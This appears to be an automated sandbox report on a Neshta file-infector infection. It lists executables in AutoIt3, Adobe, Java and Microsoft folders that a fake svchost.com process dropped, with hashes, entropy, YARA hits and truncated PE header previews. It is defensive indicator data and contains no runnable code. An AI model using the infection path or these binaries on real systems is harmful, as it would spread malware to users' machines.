                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCrwiuLWf6G/YemcUCYY8AZqQwOp9yQeRoL3:sr85C0iuVAYemcUCN8AwhOpCoL
                                                                                                                        MD5:9C8E99E8AD1568B91CBC2A9FE09304A8
                                                                                                                        SHA1:DCD08E9FE8ACFEF7F194CF0E6759F5468FA028EC
                                                                                                                        SHA-256:A33D6E9432C5D3E83EE5CFEC260EB5C1396982EFC713DA6C5B31F67712272B41
                                                                                                                        SHA-512:68270258389E3EC950F6E1535D2EA7271611A57268B7897E4C76237122DF2B7E15884F4F110C11DFB711BDF42F80F682BC0D81D62E16C954EB7AE0EC43DEF349
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):7.2906774035349695
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCloZCsdndoviDI47IcIyh3e01pxDQOF:sr85C+Z1noWILcIys01vQOF
                                                                                                                        MD5:9B9601BFE0B0E353A4AB8B3FA54F7540
                                                                                                                        SHA1:BFCC868475761DB126FBCE6D36A8F3696C00FD3F
                                                                                                                        SHA-256:289C2D7F33C2ACB203D47A677ABEBC41A6D4D580BFBB3E80A4AD65D35DC65AB8
                                                                                                                        SHA-512:AC65B689940E9CA2A02CFE07F7D53C024B3E612621CCA202DAAE1E37709D66C713C7865C336DBCF8248FC42A55776B3327F9B2AA71C7FAED2F547AFFC4DC15EE
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.586052312714495
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJZe5EaY1O/TqX0YpwD3nwBoX0M12Pnhq:JxqjQ+P04wsmJC5QOgVKnwBvPlnJml5
                                                                                                                        MD5:934C8B78754C1FB79DF08EF114600899
                                                                                                                        SHA1:5A50BBC6139CF24D3785A1AC5BC1303087ACCFE6
                                                                                                                        SHA-256:12A68206D1263D798EB284C9A6EF654E4ACFAD20310AFAADB092B54A20358A3A
                                                                                                                        SHA-512:DFF08DAADC807CF170FDC13D4C2EC20D0567B6B4F91D1853F737A6B57ECBBD332EC98D237EF4705E77693361AC3027D0298F194BD10472A2AFF9338616B8C47D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.529393382316189
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC34bCTNhZYt+zphjirUcYkzzaOvo:sr85C3MCR74+/+YcW6o
                                                                                                                        MD5:B6BA74867ECBA5541827551FEEC46F7A
                                                                                                                        SHA1:62AFF9292E306BC442F46D8835CDBA2F777A0BF1
                                                                                                                        SHA-256:8D6A0F83B4FB84B8670BB9C103071B4D40CA433876242B476DB83BDB683FC446
                                                                                                                        SHA-512:850385B0D7ECF20BEC4406D0EFB1AB0A01D9B42E2011FAFC94A8DDB49932FC3B2EB0F6D486903B84D72518928567E96BAE638891F578B9C7CD32C0CEFAC052C4
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.7205787223638
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCA75/gWXq7+8aTaI/dBKvFBvqNm48fnRV2B:sr85CA0a8aTaI/dMrvkL8fnR6
                                                                                                                        MD5:29BAF7AE561A3CCC4EF6A6988D57324D
                                                                                                                        SHA1:B2D3512E166A5F9E10FAA4E461F6EB5A6B926531
                                                                                                                        SHA-256:0B607DF09D9876EC9A80D77B9F2E20267B611A75DA95962FD2DACFF286E00F9F
                                                                                                                        SHA-512:A8CF29B616CF505F8A52E0775F0B3859F29A56181F3E1D5B16B86B40FD4E5BA0ECC5DD81098AC1024A32A1CA4575CD9B7F9F6FB2D22C75F808FE32A124065015
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\AutoIt3\Uninstall.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.52588514314363
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCWCrRRPYqa5pic6jXFdL2KiMceCry:sr85CWCrbPA6jXFN2MceCry
                                                                                                                        MD5:DF57A3FC85CD6B6CFB31C52714E2D79E
                                                                                                                        SHA1:D4DA4DA44C58BB9B818CAF22C7A578FF1EDECF26
                                                                                                                        SHA-256:E660F04725795D12A67A796BA9A96889216C2CAE4A6ADA2459F7948428136BC1
                                                                                                                        SHA-512:14FBDFFF9E7689A2800A150FB3EB7F50E12A25DEBBC7CF18ADADCDAE925A72DE8E942F5A1AC0023D419C965E2DF9684217D13A95A1AD6C1FF2B61D1B2B814F70
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.5042461329985075
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmGhFAlQY7rMdInNwUdROnIDh+vE6YjhmnCu26W:sr85CAlQGrkInNwUPOnWh+vEzEnCh7
                                                                                                                        MD5:A5EA90AC4FC049DF79D7DB1814B9B326
                                                                                                                        SHA1:1AE4394BAB6F0CEB3F1EE611B460C0FD632E87C5
                                                                                                                        SHA-256:61B25B74A7126A96A87A8D313B850CEAD18B5AB5389E9FF2B2C9A164927A08D2
                                                                                                                        SHA-512:DC6FBDEB7D79AEDB4479A4D8742D15AAA4BEEE97892715406D58E0C5E1511073C85D91B287E7CA75DE376C0C9A6BC2A307115A646600261EDDD6DD287D5AD036
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.384524945408535
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmG2kHtSSHuzUfuNAGt1Uv1JwsxtD:sr85CBNrOEuNAsWJwsD
                                                                                                                        MD5:D0B62E96259230D26E500B5D2F6E2488
                                                                                                                        SHA1:86DA8E18DCCD893874C398FDB41EEE85D766A4EC
                                                                                                                        SHA-256:1E2BC4A5441F740B2E9838EAB3964123A2D358B62E1F124C5F1E8BB4E5AB2319
                                                                                                                        SHA-512:BA4E224F4D5C8A5B5E626A7EEE6F35688528244BD7F9323CF74AF219BFA2AAFBB947DDAFD8ED815F564EDE0403B09CDBB1DEFB0A9CE9753A75C8A1C5E912FAFE
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.210368811104495
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCed9fP4LXRxQyEvzDmxvuLX+:sr85Ca4dOyEv/mxmLO
                                                                                                                        MD5:27D5B0E45DB81F836CF687549F844753
                                                                                                                        SHA1:4EE8AF1DE81163B66C20D4D4C652250D3B116544
                                                                                                                        SHA-256:365857D447BD640AC5A1BA7F32AF69211AD8F7C3AA0345C925FADCD6635D8C44
                                                                                                                        SHA-512:42BC2AAE4F5371F7F6E21CA25A28578929C160C7B0DD629239BF1C1F47C1E59AC5E56E1E33C8C1B074FE5393A88076F214D73729074E72A2AF1F6F83386A573A
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.599158686971261
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCKhp8N3YERomt8JCeToWZmKbt1H0jKWo:sr85CKn8N3YEuTofE1H0jKWo
                                                                                                                        MD5:294D120414736A7579445CCCA78F505C
                                                                                                                        SHA1:4DC265A2FC75AF686DA3EC830BF9C0072AF14581
                                                                                                                        SHA-256:AF7E482890D77DAD13F0D5A1377DEFA83CF2D802DC1444A69FD17A464C4A446C
                                                                                                                        SHA-512:8DC9F174875DD7012030EC6FE1624AAA99E068DD464BE4AEFDBA9699C39969DF0E52214B90BC46ACE204D2505DDD69C46D674DE39A6BFAA3DE213DFCA66ED196
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.6085003171859364
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKN/MZzagYK5o2IQJ/rVSgvV:sr85C/qA/WadUDFBZz9
                                                                                                                        MD5:89DC2A4E5290AE1297C2281B5CD35068
                                                                                                                        SHA1:1D091812669D1D0CF0293B9D495599BF257434D9
                                                                                                                        SHA-256:5116F46AD2BE5B402FAD8B89350F671576D995ECCF91863D827984AE42319596
                                                                                                                        SHA-512:2CECAFADFE911CAEF8F735192F7F1D60305BBBA6A390E13CDB4B5055413D931B75F276086F18AE36E32FEF31DD3B37FDDECD1FDB9F4EC12938B1EFABCD6D7E07
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.62851477500423
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCsrkFN/GjcAShJITZOG8i4e53hS5PobC:sr85Csk0cA6JITt8cXbC
                                                                                                                        MD5:61694544EA704A28532F4EC0319AC735
                                                                                                                        SHA1:F6ED53FF2792797D40ECA888567873F0570698E6
                                                                                                                        SHA-256:4183F6849773F9EED9279D5237C93719511F605276F0EB9BF2E8B2258BBAED09
                                                                                                                        SHA-512:5004069D9A41811B63CD84A049757A2F2CB061D1D6999FAE9EC083C4AE3C850BAD9D59112B452118A0AA231A4F07145D03C62FDB699074F4610D4899A662C922
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.653521772684421
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKEs2WzzIR++tGuPkNoAvBFbq6DAcBDjFsb:sr85C/qLWos+tGEkBbq6D3Bdsb
                                                                                                                        MD5:50B7F8BD51D8BEA4542C8B6FB7046568
                                                                                                                        SHA1:46FE9571A136EEDD3DC35089F096D47B32EA74C8
                                                                                                                        SHA-256:86A782FF58F3B5F1736EF23051833E340FD56A77C1EDDDBA8ECC5A507BA47EE0
                                                                                                                        SHA-512:87A46E55F78299DA53343B832D84C81C230D46AEFB71C603998DA5F6D0BB3FFE6FDA5F825F5731F7B810E21C1EF8E9812278D07E7402BB3913AF6DD66DD43CE1
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, Author: Florian Roth
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.656070779362061
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKKKajo+iKndnTdkCE1A6n82c6jbs2:sr85C/qo0o+iwdnP6ngIs2
                                                                                                                        MD5:60628C314BCF2A97CCFA9CB4241A2DAB
                                                                                                                        SHA1:6EF748A1568A9AE0D541C5CDF0F74430A59E4DE5
                                                                                                                        SHA-256:FD8BD222DB055C39D6050A10F91EEE576ADDFC37CE78F585ACC48F96E222FA90
                                                                                                                        SHA-512:2AC9ED50008A13A4255ABB338C675D53688D321E6086B6DF17B02A3F89896051F60E8565001CE0B7BCEBD0CD211DED9B9574347BC95A05922700C20806EC93EC
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, Author: Florian Roth
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.6397427450636055
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKHLgwHz2xi03XxQy012eqZwE:sr85C/qMsc2Y03BQz2eqZP
                                                                                                                        MD5:7132D6785E73B1159F3AC9AC5DE71A1C
                                                                                                                        SHA1:0EF8C262E63E3776662064D00E5C4264D0213C8B
                                                                                                                        SHA-256:629945249C52DDB4108FF5C239D4E2C79C92A545ECD25DAE395697831D648A5F
                                                                                                                        SHA-512:804BD2E14C52D226F1D470D0C73B3DE7945EA24EA4554D916FF796E24F6C7C6B5A21284396C6359CBD94ACCE87517D19984F207FEED537AE9DDE8C29D04D2A9E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, Author: Florian Roth
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.529062771218018
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCPQ5vyh0tYhgw2azkO8rn85GF:sr85CPQ5vyhvcOQn2GF
                                                                                                                        MD5:2FECE9074EC51CAA91DDEA7FBB4FFC54
                                                                                                                        SHA1:35BD848191A5C14897883B9A11BECC6DB522A88F
                                                                                                                        SHA-256:B4D954F33DDFC952FDD208E3EFFCD6A1E442DE8D07C9148C4771986F781C294F
                                                                                                                        SHA-512:F9C3249A39CB4206E495EED2A5C6130CCB04874FBFCB9D0D3D854B6625791E88C2BF29A7AE6C5E57B2B5C4EF25F39AA7BAA4B8C989A3A62D9FCFAF9116417AEB
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.4112170834310565
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCUN8aliPc8ZbyHVftptXvVWi6N8rKca:sr85CU6i/XtXv7+8rKca
                                                                                                                        MD5:BA5A5D15C15E1143A35B5ACB9DA43F23
                                                                                                                        SHA1:BE948D6A40AE1221B2E093B6634D695EEDFAD323
                                                                                                                        SHA-256:075242C15AEF5CC590E716651ED3F1F53A8BD23A37CFA60F827DBE60B7DA8918
                                                                                                                        SHA-512:3E36FA618DF02872C1F5043318A8F945912FC5162F8C9ECE7FDA323F7D8AFD53157C00519E50DA9899DA6BF3117CA82011757B987726F968C3B7B5A632066EDA
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.374994892226591
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCrNsxigdJqueeYUOc1wxNXI:sr85CCnneeVV1
                                                                                                                        MD5:BED5A0265D4F2739606BD0C79DB41BDB
                                                                                                                        SHA1:0EAE9CA564CC3B83B4B7CAAF64FED47567C8A6D1
